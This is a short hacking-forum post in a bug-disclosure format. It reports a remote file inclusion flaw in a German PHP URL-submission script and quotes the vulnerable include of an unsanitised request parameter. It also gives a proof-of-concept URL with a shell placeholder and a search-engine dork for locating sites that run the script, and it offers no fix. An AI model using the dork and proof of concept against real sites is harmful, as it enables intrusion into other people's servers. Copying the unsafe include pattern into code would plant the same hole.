Jump to content
Guest BanKai

[RST] Quit Submit URL Submit and Spider Robot RFI

By Guest BanKai, in Proiecte RST

Recommended Posts

Guest BanKai

Guest BanKai

Posted
Posted

[RST BugTrack]

Script Name:

Quit Submit URL Submit and Spider Robot
(due to the whole software and titles being in german I do not guarantee this is the software's real name ... shit I gotta learn german)

Bug Type:

Remote File Inclusion

Bug In:

index.php

Vulnerable Code:


$seite = $_REQUEST['seite'];
[...]
<? include "$seite";?>

Proof Of Concept:

http://www.website.com/index.php?seite=[SHELL HERE]

Dork:

inurl:"index.php?seite=webkatalog"

[/RST BugTrack]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...